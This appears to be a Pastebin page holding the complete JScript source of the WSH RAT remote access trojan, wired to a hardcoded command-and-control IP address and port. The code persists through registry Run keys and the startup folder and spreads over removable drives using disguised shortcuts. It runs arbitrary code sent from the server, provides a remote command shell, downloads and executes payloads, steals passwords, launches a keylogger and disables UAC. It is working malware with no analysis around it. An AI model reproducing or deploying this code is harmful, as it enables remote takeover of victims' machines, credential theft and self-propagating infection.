Racco42

wshrat

Apr 24th, 2019
1,700
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. function writeBytes(file, bytes) {
  2. try {
  3. var binaryStream = WScript.CreateObject("ADODB.Stream");
  4. binaryStream.Type = 1;
  5. binaryStream.Open();
  6. binaryStream.Write(bytes);
  7. binaryStream.SaveToFile(file, 2);
  8. } catch (err) {}
  9. }
  10.  
  11. function decodeBase64(base64) {
  12. var DM = WScript.CreateObject("Microsoft.XMLDOM");
  13. var EL = DM.createElement("tmp");
  14. EL.dataType = "bin.base64";
  15. EL.text = base64;
  16. return EL.nodeTypedValue;
  17. }
  18. wshShell1 = null;
  19. var host = "185.101.94.172";
  20. var port = 3018;
  21. var installdir = "%temp%";
  22. var lnkfile = true;
  23. var lnkfolder = true;
  24. var shellobj = WScript.createObject("wscript.shell");
  25. var filesystemobj = WScript.createObject("scripting.filesystemobject");
  26. var httpobj = WScript.createObject("msxml2.xmlhttp");
  27. var installname = WScript.scriptName;
  28. var startup = shellobj.specialFolders("startup") + "\\";
  29. installdir = shellobj.ExpandEnvironmentStrings(installdir) + "\\";
  30. if (!filesystemobj.folderExists(installdir)) {
  31. installdir = shellobj.ExpandEnvironmentStrings("%temp%") + "\\";
  32. }
  33. var spliter = "|";
  34. var sleep = 5000;
  35. var response, cmd, param, oneonce;
  36. var inf = "";
  37. var usbspreading = "";
  38. var startdate = "";
  39. instance();
  40. while (true) {
  41. try {
  42. install();
  43. response = "";
  44. response = post("is-ready", "");
  45. cmd = response.split(spliter);
  46. switch (cmd[0]) {
  47. case "disconnect":
  48. WScript.quit();
  49. break;
  50. case "reboot":
  51. shellobj.run("%comspec% /c shutdown /r /t 0 /f", 0, true);
  52. break;
  53. case "shutdown":
  54. shellobj.run("%comspec% /c shutdown /s /t 0 /f", 0, true);
  55. break;
  56. case "excecute":
  57. param = cmd[1];
  58. eval(param);
  59. break;
  60. case "get-pass":
  61. passgrabber(cmd[1], "cmdc.exe", cmd[2]);
  62. break;
  63. case "uninstall":
  64. uninstall();
  65. break;
  66. case "up-n-exec":
  67. download(cmd[1], cmd[2]);
  68. break;
  69. case "bring-log":
  70. upload(installdir + "wshlogs\\" + cmd[1], "take-log");
  71. break;
  72. case "down-n-exec":
  73. sitedownloader(cmd[1], cmd[2]);
  74. break;
  75. case "filemanager":
  76. servicestarter(cmd[1], "fm-plugin.exe", information());
  77. break;
  78. case "rdp":
  79. servicestarter(cmd[1], "rd-plugin.exe", information());
  80. break;
  81. case "keylogger":
  82. keyloggerstarter(cmd[1], "kl-plugin.exe", information(), 0);
  83. break;
  84. case "offline-keylogger":
  85. keyloggerstarter(cmd[1], "kl-plugin.exe", information(), 1);
  86. break;
  87. case "browse-logs":
  88. post("is-logs", enumfaf(installdir + "wshlogs"));
  89. break;
  90. case "cmd-shell":
  91. param = cmd[1];
  92. post("is-cmd-shell", cmdshell(param));
  93. break;
  94. case "get-processes":
  95. post("is-processes", enumprocess());
  96. break;
  97. case "disable-uac":
  98. if (WScript.Arguments.Named.Exists("elevated") == true) {
  99. var oReg = GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\default:StdRegProv");
  100. oReg.SetDwordValue(0x80000002, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", "EnableLUA", 0);
  101. oReg.SetDwordValue(0x80000002, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", "ConsentPromptBehaviorAdmin", 0);
  102. oReg = null;
  103. updatestatus("UAC+Disabled+(Reboot+Required)");
  104. }
  105. break;
  106. case "elevate":
  107. if (WScript.Arguments.Named.Exists("elevated") == false) {
  108. try {
  109. oneonce.close();
  110. oneonce = null;
  111. WScript.CreateObject("Shell.Application").ShellExecute("wscript.exe", " //B \"" + WScript.ScriptFullName + "\" /elevated", "", "runas", 1);
  112. updatestatus("Client+Elevated");
  113. } catch (nn) {}
  114. WScript.quit();
  115. } else {
  116. updatestatus("Client+Elevated");
  117. }
  118. break;
  119. case "if-elevate":
  120. if (WScript.Arguments.Named.Exists("elevated") == false) {
  121. updatestatus("Client+Not+Elevated");
  122. } else {
  123. updatestatus("Client+Elevated");
  124. }
  125. break;
  126. case "kill-process":
  127. exitprocess(cmd[1]);
  128. break;
  129. case "sleep":
  130. param = cmd[1];
  131. sleep = eval(param);
  132. break;
  133. }
  134. } catch (er) {}
  135. WScript.sleep(sleep);
  136. }
  137.  
  138. function install() {
  139. var lnkobj;
  140. var filename;
  141. var foldername;
  142. var fileicon;
  143. var foldericon;
  144. upstart();
  145. for (var dri = new Enumerator(filesystemobj.drives); !dri.atEnd(); dri.moveNext()) {
  146. var drive = dri.item();
  147. if (drive.isready == true) {
  148. if (drive.freespace > 0) {
  149. if (drive.drivetype == 1) {
  150. try {
  151. filesystemobj.copyFile(WScript.scriptFullName, drive.path + "\\" + installname, true);
  152. if (filesystemobj.fileExists(drive.path + "\\" + installname)) {
  153. filesystemobj.getFile(drive.path + "\\" + installname).attributes = 2 + 4;
  154. }
  155. } catch (eiju) {}
  156. for (var fi = new Enumerator(filesystemobj.getfolder(drive.path + "\\").files); !fi.atEnd(); fi.moveNext()) {
  157. try {
  158. var file = fi.item();
  159. if (lnkfile == false) {
  160. break;
  161. }
  162. if (file.name.indexOf(".")) {
  163. if ((file.name.split(".")[file.name.split(".").length - 1]).toLowerCase() != "lnk") {
  164. file.attributes = 2 + 4;
  165. if (file.name.toUpperCase() != installname.toUpperCase()) {
  166. filename = file.name.split(".");
  167. lnkobj = shellobj.createShortcut(drive.path + "\\" + filename[0] + ".lnk");
  168. lnkobj.windowStyle = 7;
  169. lnkobj.targetPath = "cmd.exe";
  170. lnkobj.workingDirectory = "";
  171. lnkobj.arguments = "/c start " + installname.replace(new RegExp(" ", "g"), "\" \"") + "&start " + file.name.replace(new RegExp(" ", "g"), "\" \"") +
  172. "&exit";
  173. try {
  174. fileicon = shellobj.RegRead("HKEY_LOCAL_MACHINE\\software\\classes\\" + shellobj.RegRead("HKEY_LOCAL_MACHINE\\software\\classes\\." + file.name.s
  175. plit(".")[file.name.split(".").length - 1] + "\\") + "\\defaulticon\\");
  176. } catch (eeee) {}
  177. if (fileicon.indexOf(",") == 0) {
  178. lnkobj.iconLocation = file.path;
  179. } else {
  180. lnkobj.iconLocation = fileicon;
  181. }
  182. lnkobj.save();
  183. }
  184. }
  185. }
  186. } catch (err) {}
  187. }
  188. for (var fi = new Enumerator(filesystemobj.getfolder(drive.path + "\\").subFolders); !fi.atEnd(); fi.moveNext()) {
  189. try {
  190. var folder = fi.item();
  191. if (lnkfolder == false) {
  192. break;
  193. }
  194. folder.attributes = 2 + 4;
  195. foldername = folder.name;
  196. lnkobj = shellobj.createShortcut(drive.path + "\\" + foldername + ".lnk");
  197. lnkobj.windowStyle = 7;
  198. lnkobj.targetPath = "cmd.exe";
  199. lnkobj.workingDirectory = "";
  200. lnkobj.arguments = "/c start " + installname.replace(new RegExp(" ", "g"), "\" \"") + "&start explorer " + folder.name.replace(new RegExp(" ", "g"), "\" \"") + "
  201. &exit";
  202. foldericon = shellobj.RegRead("HKEY_LOCAL_MACHINE\\software\\classes\\folder\\defaulticon\\");
  203. if (foldericon.indexOf(",") == 0) {
  204. lnkobj.iconLocation = folder.path;
  205. } else {
  206. lnkobj.iconLocation = foldericon;
  207. }
  208. lnkobj.save();
  209. } catch (err) {}
  210. }
  211. }
  212. }
  213. }
  214. }
  215. }
  216.  
  217. function uninstall() {
  218. try {
  219. var filename;
  220. var foldername;
  221. try {
  222. shellobj.RegDelete("HKEY_CURRENT_USER\\software\\microsoft\\windows\\currentversion\\run\\" + installname.split(".")[0]);
  223. shellobj.RegDelete("HKEY_LOCAL_MACHINE\\software\\microsoft\\windows\\currentversion\\run\\" + installname.split(".")[0]);
  224. } catch (ei) {}
  225. try {
  226. filesystemobj.deleteFile(startup + installname, true);
  227. filesystemobj.deleteFile(wscript.scriptfullname, true);
  228. } catch (eej) {}
  229. for (var dri = new Enumerator(filesystemobj.drives); !dri.atEnd(); dri.moveNext()) {
  230. var drive = dri.item();
  231. if (drive.isready == true) {
  232. if (drive.freespace > 0) {
  233. if (drive.drivetype == 1) {
  234. for (var fi = new Enumerator(filesystemobj.getfolder(drive.path + "\\").files); !fi.atEnd(); fi.moveNext()) {
  235. var file = fi.item();
  236. try {
  237. if (file.name.indexOf(".")) {
  238. if ((file.name.split(".")[file.name.split(".").length - 1]).toLowerCase() != "lnk") {
  239. file.attributes = 0;
  240. if (file.name.toUpperCase() != installname.toUpperCase()) {
  241. filename = file.name.split(".");
  242. filesystemobj.deleteFile(drive.path + "\\" + filename[0] + ".lnk");
  243. } else {
  244. filesystemobj.deleteFile(drive.path + "\\" + file.name);
  245. }
  246. } else {
  247. filesystemobj.deleteFile(file.path);
  248. }
  249. }
  250. } catch (ex) {}
  251. }
  252. for (var fi = new Enumerator(filesystemobj.getfolder(drive.path + "\\").subFolders); !fi.atEnd(); fi.moveNext()) {
  253. var folder = fi.item();
  254. folder.attributes = 0;
  255. }
  256. }
  257. }
  258. }
  259. }
  260. } catch (err) {}
  261. WScript.quit();
  262. }
  263.  
  264. function post(cmd, param) {
  265. try {
  266. httpobj.open("post", "http://" + host + ":" + port + "/" + cmd, false);
  267. httpobj.setRequestHeader("user-agent:", information());
  268. httpobj.send(param);
  269. return httpobj.responseText;
  270. } catch (err) {
  271. return "";
  272. }
  273. }
  274.  
  275. function information() {
  276. try {
  277. if (inf == "") {
  278. inf = hwid() + spliter;
  279. inf = inf + shellobj.ExpandEnvironmentStrings("%computername%") + spliter;
  280. inf = inf + shellobj.ExpandEnvironmentStrings("%username%") + spliter;
  281. var root = GetObject("winmgmts:{impersonationlevel=impersonate}!\\\\.\\root\\cimv2");
  282. var os = root.ExecQuery("select * from win32_operatingsystem");
  283. for (var fi = new Enumerator(os); !fi.atEnd(); fi.moveNext()) {
  284. var osinfo = fi.item();
  285. inf = inf + osinfo.caption + spliter;
  286. break;
  287. }
  288. inf = inf + "plus" + spliter;
  289. inf = inf + security() + spliter;
  290. inf = inf + usbspreading;
  291. inf = "WSHRAT" + spliter + inf + spliter + "JavaScript";
  292. return inf;
  293. } else {
  294. return inf;
  295. }
  296. } catch (err) {
  297. return "";
  298. }
  299. }
  300.  
  301. function upstart() {
  302. try {
  303. try {
  304. shellobj.RegWrite("HKEY_CURRENT_USER\\software\\microsoft\\windows\\currentversion\\run\\" + installname.split(".")[0], "wscript.exe //B \"" + installdir + installname + "\"", "
  305. REG_SZ");
  306. shellobj.RegWrite("HKEY_LOCAL_MACHINE\\software\\microsoft\\windows\\currentversion\\run\\" + installname.split(".")[0], "wscript.exe //B \"" + installdir + installname + "\"",
  307. "REG_SZ");
  308. } catch (ei) {}
  309. filesystemobj.copyFile(WScript.scriptFullName, installdir + installname, true);
  310. filesystemobj.copyFile(WScript.scriptFullName, startup + installname, true);
  311. } catch (err) {}
  312. }
  313.  
  314. function hwid() {
  315. try {
  316. var root = GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\cimv2");
  317. var disks = root.ExecQuery("select * from win32_logicaldisk");
  318. for (var fi = new Enumerator(disks); !fi.atEnd(); fi.moveNext()) {
  319. var disk = fi.item();
  320. if (disk.volumeSerialNumber != "") {
  321. return disk.volumeSerialNumber;
  322. break;
  323. }
  324. }
  325. } catch (err) {
  326. return "";
  327. }
  328. }
  329.  
  330. function security() {
  331. try {
  332. var objwmiservice = GetObject("winmgmts:{impersonationlevel=impersonate}!\\\\.\\root\\cimv2");
  333. var colitems = objwmiservice.ExecQuery("select * from win32_operatingsystem", null, 48);
  334. var versionstr, osversion;
  335. for (var fi = new Enumerator(colitems); !fi.atEnd(); fi.moveNext()) {
  336. var objitem = fi.item();
  337. versionstr = objitem.version.toString().split(".");
  338. }
  339. osversion = versionstr[0] + ".";
  340. for (var x = 1; x < versionstr.length; x++) {
  341. osversion = osversion + versionstr[0];
  342. }
  343. osversion = eval(osversion);
  344. var sc;
  345. if (osversion > 6) {
  346. sc = "securitycenter2";
  347. } else {
  348. sc = "securitycenter";
  349. }
  350. var objsecuritycenter = GetObject("winmgmts:\\\\localhost\\root\\" + sc);
  351. var colantivirus = objsecuritycenter.ExecQuery("select * from antivirusproduct", "wql", 0);
  352. var secu = "";
  353. for (var fi = new Enumerator(colantivirus); !fi.atEnd(); fi.moveNext()) {
  354. var objantivirus = fi.item();
  355. secu = secu + objantivirus.displayName + " .";
  356. }
  357. if (secu == "") {
  358. secu = "nan-av";
  359. }
  360. return secu;
  361. } catch (err) {}
  362. }
  363.  
  364. function getDate() {
  365. var s = "";
  366. var d = new Date();
  367. s += d.getDate() + "/";
  368. s += (d.getMonth() + 1) + "/";
  369. s += d.getYear();
  370. return s;
  371. }
  372.  
  373. function instance() {
  374. try {
  375. try {
  376. usbspreading = shellobj.RegRead("HKEY_LOCAL_MACHINE\\software\\" + installname.split(".")[0] + "\\");
  377. } catch (eee) {}
  378. if (usbspreading == "") {
  379. if (WScript.scriptFullName.substr(1).toLowerCase() == ":\\" + installname.toLowerCase()) {
  380. usbspreading = "true - " + getDate();
  381. try {
  382. shellobj.RegWrite("HKEY_LOCAL_MACHINE\\software\\" + installname.split(".")[0] + "\\", usbspreading, "REG_SZ");
  383. } catch (eeeee) {}
  384. } else {
  385. usbspreading = "false - " + getDate();
  386. try {
  387. shellobj.RegWrite("HKEY_LOCAL_MACHINE\\software\\" + installname.split(".")[0] + "\\", usbspreading, "REG_SZ");
  388. } catch (eeeee) {}
  389. }
  390. }
  391. upstart();
  392. var scriptfullnameshort = filesystemobj.getFile(WScript.scriptFullName);
  393. var installfullnameshort = filesystemobj.getFile(installdir + installname);
  394. if (scriptfullnameshort.shortPath.toLowerCase() != installfullnameshort.shortPath.toLowerCase()) {
  395. shellobj.run("wscript.exe //B \"" + installdir + installname + "\"");
  396. WScript.quit();
  397. }
  398. var oneonce = filesystemobj.openTextFile(installdir + installname, 8, false);
  399. } catch (err) {
  400. WScript.quit();
  401. }
  402. }
  403.  
  404. function passgrabber(fileurl, filename, retcmd) {
  405. shellobj.run("%comspec% /c taskkill /F /IM " + filename, 0, true);
  406. try {
  407. filesystemobj.deleteFile(installdir + filename + "data");
  408. } catch (ey) {}
  409. var config_file = installdir + filename.substr(0, filename.lastIndexOf(".")) + ".cfg";
  410. var cfg = "[General]\nShowGridLines=0\nSaveFilterIndex=0\nShowInfoTip=1\nUseProfileFolder=0\nProfileFolder=\nMarkOddEvenRows=0\nWinPos=2C 00 00 00 00 00 00 00 01 00 00 00 FF FF FF FF FF
  411. FF FF FF FF FF FF FF FF FF FF FF 00 00 00 00 00 00 00 00 80 02 00 00 E0 01 00 00\nColumns=FA 00 00 00 FA 00 01 00 6E 00 02 00 6E 00 03 00 78 00 04 00 78 00 05 00 78 00 06 00 64 00 07 00 FA
  412. 00 08 00\nSort=0";
  413. var writer = filesystemobj.openTextFile(config_file, 2, true);
  414. writer.writeLine(cfg);
  415. writer.close();
  416. writer = null;
  417. var strlink = fileurl;
  418. var strsaveto = installdir + filename;
  419. var objhttpdownload = WScript.CreateObject("msxml2.xmlhttp");
  420. objhttpdownload.open("get", strlink, false);
  421. objhttpdownload.setRequestHeader("cache-control:", "max-age=0");
  422. objhttpdownload.send();
  423. var objfsodownload = WScript.CreateObject("scripting.filesystemobject");
  424. if (objfsodownload.fileExists(strsaveto)) {
  425. objfsodownload.deleteFile(strsaveto);
  426. }
  427. if (objhttpdownload.status == 200) {
  428. var objstreamdownload = WScript.CreateObject("adodb.stream");
  429. objstreamdownload.Type = 1;
  430. objstreamdownload.Open();
  431. objstreamdownload.Write(objhttpdownload.responseBody);
  432. objstreamdownload.SaveToFile(strsaveto);
  433. objstreamdownload.close();
  434. objstreamdownload = null;
  435. }
  436. if (objfsodownload.fileExists(strsaveto)) {
  437. var runner = WScript.CreateObject("Shell.Application");
  438. var saver = objfsodownload.getFile(strsaveto).shortPath
  439. runner.shellExecute(saver, " /stext " + saver + "data");
  440. WScript.sleep(2000);
  441. deletefaf(strsaveto);
  442. upload(saver + "data", retcmd);
  443. }
  444. }
  445.  
  446. function keyloggerstarter(fileurl, filename, filearg, is_offline) {
  447. shellobj.run("%comspec% /c taskkill /F /IM " + filename, 0, true);
  448. var strlink = fileurl;
  449. var strsaveto = installdir + filename;
  450. var objhttpdownload = WScript.CreateObject("msxml2.xmlhttp");
  451. objhttpdownload.open("get", strlink, false);
  452. objhttpdownload.setRequestHeader("cache-control:", "max-age=0");
  453. objhttpdownload.send();
  454. var objfsodownload = WScript.CreateObject("scripting.filesystemobject");
  455. if (objfsodownload.fileExists(strsaveto)) {
  456. objfsodownload.deleteFile(strsaveto);
  457. }
  458. if (objhttpdownload.status == 200) {
  459. var objstreamdownload = WScript.CreateObject("adodb.stream");
  460. objstreamdownload.Type = 1;
  461. objstreamdownload.Open();
  462. objstreamdownload.Write(objhttpdownload.responseBody);
  463. objstreamdownload.SaveToFile(strsaveto);
  464. objstreamdownload.close();
  465. objstreamdownload = null;
  466. }
  467. if (objfsodownload.fileExists(strsaveto)) {
  468. shellobj.run("\"" + strsaveto + "\" " + host + " " + port + " \"" + filearg + "\" " + is_offline);
  469. }
  470. }
  471.  
  472. function servicestarter(fileurl, filename, filearg) {
  473. shellobj.run("%comspec% /c taskkill /F /IM " + filename, 0, true);
  474. var strlink = fileurl;
  475. var strsaveto = installdir + filename;
  476. var objhttpdownload = WScript.CreateObject("msxml2.xmlhttp");
  477. objhttpdownload.open("get", strlink, false);
  478. objhttpdownload.setRequestHeader("cache-control:", "max-age=0");
  479. objhttpdownload.send();
  480. var objfsodownload = WScript.CreateObject("scripting.filesystemobject");
  481. if (objfsodownload.fileExists(strsaveto)) {
  482. objfsodownload.deleteFile(strsaveto);
  483. }
  484. if (objhttpdownload.status == 200) {
  485. var objstreamdownload = WScript.CreateObject("adodb.stream");
  486. objstreamdownload.Type = 1;
  487. objstreamdownload.Open();
  488. objstreamdownload.Write(objhttpdownload.responseBody);
  489. objstreamdownload.SaveToFile(strsaveto);
  490. objstreamdownload.close();
  491. objstreamdownload = null;
  492. }
  493. if (objfsodownload.fileExists(strsaveto)) {
  494. shellobj.run("\"" + strsaveto + "\" " + host + " " + port + " \"" + filearg + "\"");
  495. }
  496. }
  497.  
  498. function sitedownloader(fileurl, filename) {
  499. var strlink = fileurl;
  500. var strsaveto = installdir + filename;
  501. var objhttpdownload = WScript.CreateObject("msxml2.serverxmlhttp");
  502. objhttpdownload.open("get", strlink, false);
  503. objhttpdownload.setRequestHeader("cache-control", "max-age=0");
  504. objhttpdownload.send();
  505. var objfsodownload = WScript.CreateObject("scripting.filesystemobject");
  506. if (objfsodownload.fileExists(strsaveto)) {
  507. objfsodownload.deleteFile(strsaveto);
  508. }
  509. if (objhttpdownload.status == 200) {
  510. var objstreamdownload = WScript.CreateObject("adodb.stream");
  511. objstreamdownload.Type = 1;
  512. objstreamdownload.Open();
  513. objstreamdownload.Write(objhttpdownload.responseBody);
  514. objstreamdownload.SaveToFile(strsaveto);
  515. objstreamdownload.close();
  516. objstreamdownload = null;
  517. }
  518. if (objfsodownload.fileExists(strsaveto)) {
  519. shellobj.run(objfsodownload.getFile(strsaveto).shortPath);
  520. updatestatus("Executed+File");
  521. }
  522. }
  523.  
  524. function download(fileurl, filedir) {
  525. if (filedir == "") {
  526. filedir = installdir;
  527. }
  528. strsaveto = filedir + fileurl.substr(fileurl.lastIndexOf("\\") + 1);
  529. var objhttpdownload = WScript.CreateObject("msxml2.xmlhttp");
  530. objhttpdownload.open("post", "http://" + host + ":" + port + "/" + "send-to-me" + spliter + fileurl, false);
  531. objhttpdownload.setRequestHeader("user-agent:", information());
  532. objhttpdownload.send("");
  533. var objfsodownload = WScript.CreateObject("scripting.filesystemobject");
  534. if (objfsodownload.fileExists(strsaveto)) {
  535. objfsodownload.deleteFile(strsaveto);
  536. }
  537. if (objhttpdownload.status == 200) {
  538. var objstreamdownload = WScript.CreateObject("adodb.stream");
  539. objstreamdownload.Type = 1;
  540. objstreamdownload.Open();
  541. objstreamdownload.Write(objhttpdownload.responseBody);
  542. objstreamdownload.SaveToFile(strsaveto);
  543. objstreamdownload.close();
  544. objstreamdownload = null;
  545. }
  546. if (objfsodownload.fileExists(strsaveto)) {
  547. shellobj.run(objfsodownload.getFile(strsaveto).shortPath);
  548. updatestatus("Executed+File");
  549. }
  550. }
  551.  
  552. function updatestatus(status_msg) {
  553. var objsoc = WScript.CreateObject("msxml2.xmlhttp");
  554. objsoc.open("post", "http://" + host + ":" + port + "/" + "update-status" + spliter + status_msg, false);
  555. objsoc.setRequestHeader("user-agent:", information());
  556. objsoc.send("");
  557. }
  558.  
  559. function upload(fileurl, retcmd) {
  560. var httpobj, objstreamuploade, buffer;
  561. var objstreamuploade = WScript.CreateObject("adodb.stream");
  562. objstreamuploade.Type = 1;
  563. objstreamuploade.Open();
  564. objstreamuploade.loadFromFile(fileurl);
  565. buffer = objstreamuploade.Read();
  566. objstreamuploade.close();
  567. objstreamdownload = null;
  568. var httpobj = WScript.CreateObject("msxml2.xmlhttp");
  569. httpobj.open("post", "http://" + host + ":" + port + "/" + retcmd, false);
  570. httpobj.setRequestHeader("user-agent:", information());
  571. httpobj.send(buffer);
  572. }
  573.  
  574. function deletefaf(url) {
  575. try {
  576. filesystemobj.deleteFile(url);
  577. filesystemobj.deleteFolder(url);
  578. } catch (err) {}
  579. }
  580.  
  581. function cmdshell(cmd) {
  582. var httpobj, oexec, readallfromany;
  583. var strsaveto = installdir + "out.txt";
  584. shellobj.run("%comspec% /c " + cmd + " > \"" + strsaveto + "\"", 0, true);
  585. readallfromany = filesystemobj.openTextFile(strsaveto).readAll();
  586. try {
  587. filesystemobj.deleteFile(strsaveto);
  588. } catch (ee) {}
  589. return readallfromany;
  590. }
  591.  
  592. function enumprocess() {
  593. var ep = "";
  594. try {
  595. var objwmiservice = GetObject("winmgmts:\\\\.\\root\\cimv2");
  596. var colitems = objwmiservice.ExecQuery("select * from win32_process", null, 48);
  597. for (var fi = new Enumerator(colitems); !fi.atEnd(); fi.moveNext()) {
  598. var objitem = fi.item();
  599. ep = ep + objitem.name + "^";
  600. ep = ep + objitem.processId + "^";
  601. ep = ep + objitem.executablePath + spliter;
  602. }
  603. } catch (er) {}
  604. return ep;
  605. }
  606.  
  607. function exitprocess(pid) {
  608. try {
  609. shellobj.run("taskkill /F /T /PID " + pid, 0, true);
  610. } catch (err) {}
  611. }
  612.  
  613. function getParentDirectory(path) {
  614. var fo = filesystemobj.getFile(path);
  615. return filesystemobj.getParentFolderName(fo);
  616. }
  617.  
  618. function enumfaf(enumdir) {
  619. var re = "";
  620. try {
  621. for (var fi = new Enumerator(filesystemobj.getFolder(enumdir).subfolders); !fi.atEnd(); fi.moveNext()) {
  622. var folder = fi.item();
  623. re = re + folder.name + "^^d^" + folder.attributes + spliter;
  624. }
  625. for (var fi = new Enumerator(filesystemobj.getFolder(enumdir).files); !fi.atEnd(); fi.moveNext()) {
  626. var file = fi.item();
  627. re = re + file.name + "^" + file.size + "^" + file.attributes + spliter;
  628. }
  629. } catch (err) {}
  630. return re;
  631. }
RAW Paste Data